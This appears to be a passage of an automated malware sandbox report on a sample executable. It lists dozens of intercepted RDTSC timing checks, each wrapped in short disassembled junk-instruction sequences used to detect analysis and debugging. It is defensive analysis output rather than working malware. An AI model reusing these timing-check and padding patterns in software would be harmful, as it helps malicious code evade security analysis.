                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 356090 second address: 3560AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8080B8A788h 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 3560AC second address: 35610B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F8080FFFC66h 0x0000000c jmp 00007F8080FFFC5Eh 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pop edx 0x00000014 pop eax 0x00000015 jo 00007F8080FFFC96h 0x0000001b jmp 00007F8080FFFC62h 0x00000020 pushad 0x00000021 jmp 00007F8080FFFC63h 0x00000026 jmp 00007F8080FFFC63h 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 29121D second address: 29122F instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8080B8A776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d push edx 0x0000000e pop edx 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 29122F second address: 29123B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jp 00007F8080FFFC56h 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 355C37 second address: 355C4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8080B8A781h 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 35A5EB second address: 35A606 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8080FFFC67h 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 28538C second address: 2853A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jno 00007F8080B8A776h 0x0000000d jnl 00007F8080B8A776h 0x00000013 pop edx 0x00000014 popad 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2853A6 second address: 2853B0 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8080FFFC56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2853B0 second address: 2853BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 36CD25 second address: 36CD2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 36CD2B second address: 36CD3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jp 00007F8080B8A776h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 36B644 second address: 36B65C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080FFFC64h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 36B65C second address: 36B666 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 36B666 second address: 36B66C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 36BC39 second address: 36BC5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007F8080B8A784h 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 36BC5B second address: 36BC66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 36BC66 second address: 36BC87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080B8A786h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 36C089 second address: 36C09A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007F8080FFFC5Ch 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 36C09A second address: 36C0A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 382468 second address: 38246D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 385007 second address: 385032 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8080B8A787h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jno 00007F8080B8A776h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 385032 second address: 385036 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 385036 second address: 38503A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 38503A second address: 385040 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 385040 second address: 385046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 37E40E second address: 37E419 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 37E419 second address: 37E428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007F8080B8A776h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 392EB0 second address: 392EBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F8080FFFC56h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 392EBC second address: 392EDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push ebx 0x0000000c jmp 00007F8080B8A781h 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 3A866C second address: 3A867C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080FFFC5Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 3ABC19 second address: 3ABC63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8080B8A784h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f ja 00007F8080B8A776h 0x00000015 jmp 00007F8080B8A77Ch 0x0000001a jg 00007F8080B8A776h 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 jnp 00007F8080B8A776h 0x00000029 jmp 00007F8080B8A77Bh 0x0000002e rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 3ABC63 second address: 3ABC80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080FFFC69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 3ABC80 second address: 3ABC96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8080B8A780h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 3ABC96 second address: 3ABCA0 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8080FFFC56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 3ABCA0 second address: 3ABCC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8080B8A784h 0x0000000d jmp 00007F8080B8A77Ch 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 3AC25C second address: 3AC293 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 jmp 00007F8080FFFC64h 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e push edi 0x0000000f pushad 0x00000010 popad 0x00000011 jns 00007F8080FFFC56h 0x00000017 pop edi 0x00000018 popad 0x00000019 jnp 00007F8080FFFC72h 0x0000001f pushad 0x00000020 jnc 00007F8080FFFC56h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 3AC78D second address: 3AC793 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 3AE38C second address: 3AE3AD instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8080FFFC56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F8080FFFC67h 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 3B0D13 second address: 3B0D18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 3B0F67 second address: 3B0F94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080FFFC5Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnc 00007F8080FFFC62h 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jne 00007F8080FFFC56h 0x0000001a rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 3B0F94 second address: 3B0FA2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8080B8A776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 3B102D second address: 3B1078 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jl 00007F8080FFFC56h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f mov dword ptr [ebp+122D1C59h], edx 0x00000015 push 00000004h 0x00000017 call 00007F8080FFFC60h 0x0000001c xor dx, 34CBh 0x00000021 pop edx 0x00000022 call 00007F8080FFFC59h 0x00000027 push esi 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F8080FFFC62h 0x0000002f rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 3B1078 second address: 3B1098 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push esi 0x00000009 pushad 0x0000000a jmp 00007F8080B8A784h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 3B1098 second address: 3B10AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jl 00007F8080FFFC60h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 3B10AB second address: 3B10B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 3B10B8 second address: 3B10BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 3B10BE second address: 3B10D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F8080B8A77Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 3B10D2 second address: 3B10D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FF0019 second address: 4FF001D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FF001D second address: 4FF003A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080FFFC69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FD0E9F second address: 4FD0EB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8080B8A77Eh 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FD0EB1 second address: 4FD0EED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007F8080FFFC5Ch 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007F8080FFFC60h 0x00000016 mov ebp, esp 0x00000018 pushad 0x00000019 mov bh, cl 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e mov bx, 375Ah 0x00000022 popad 0x00000023 popad 0x00000024 pop ebp 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 mov bl, 22h 0x0000002a rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 5010F15 second address: 5010F19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 5010F19 second address: 5010F1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FB00D4 second address: 4FB00DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FB00DA second address: 4FB00E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FB00E0 second address: 4FB0126 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushad 0x0000000b mov ecx, 72E16DC3h 0x00000010 call 00007F8080B8A788h 0x00000015 pop ecx 0x00000016 popad 0x00000017 mov dx, 9A46h 0x0000001b popad 0x0000001c push eax 0x0000001d pushad 0x0000001e mov si, di 0x00000021 popad 0x00000022 xchg eax, ebp 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F8080B8A77Eh 0x0000002a rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FB0126 second address: 4FB0156 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, A194h 0x00000007 jmp 00007F8080FFFC5Dh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov ebp, esp 0x00000011 jmp 00007F8080FFFC5Eh 0x00000016 push dword ptr [ebp+04h] 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FB0156 second address: 4FB015A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FB015A second address: 4FB0160 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FD0CCD second address: 4FD0CD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FD0811 second address: 4FD0816 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FD0816 second address: 4FD083F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080B8A784h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov ebx, 466BF894h 0x00000010 mov ecx, edx 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FD083F second address: 4FD0843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FD0843 second address: 4FD0853 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080B8A77Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FD0715 second address: 4FD073B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 xchg eax, ebp 0x00000007 jmp 00007F8080FFFC5Ch 0x0000000c push eax 0x0000000d jmp 00007F8080FFFC5Bh 0x00000012 xchg eax, ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FD073B second address: 4FD073F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FD073F second address: 4FD075A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080FFFC67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FD075A second address: 4FD0785 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F8080B8A77Fh 0x00000008 pop ecx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F8080B8A781h 0x00000015 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FD0785 second address: 4FD078A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FD078A second address: 4FD07A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8080B8A77Dh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov di, DFAEh 0x00000014 push edx 0x00000015 pop esi 0x00000016 popad 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FD03F2 second address: 4FD041D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080FFFC69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8080FFFC5Ah 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FD041D second address: 4FD0469 instructions: 0x00000000 rdtsc 0x00000002 call 00007F8080B8A782h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F8080B8A77Bh 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jmp 00007F8080B8A782h 0x00000019 jmp 00007F8080B8A782h 0x0000001e popad 0x0000001f rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FD0469 second address: 4FD046F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FD046F second address: 4FD0473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FD0473 second address: 4FD04A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F8080FFFC69h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F8080FFFC5Dh 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FE0219 second address: 4FE0229 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8080B8A77Ch 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FF039C second address: 4FF03A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FF03A2 second address: 4FF03A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FD0651 second address: 4FD0692 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080FFFC5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F8080FFFC66h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F8080FFFC67h 0x00000018 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FD0692 second address: 4FD06E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 pushfd 0x00000006 jmp 00007F8080B8A77Bh 0x0000000b sub ax, AABEh 0x00000010 jmp 00007F8080B8A789h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pop ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F8080B8A788h 0x00000023 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FD06E2 second address: 4FD06F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080FFFC5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
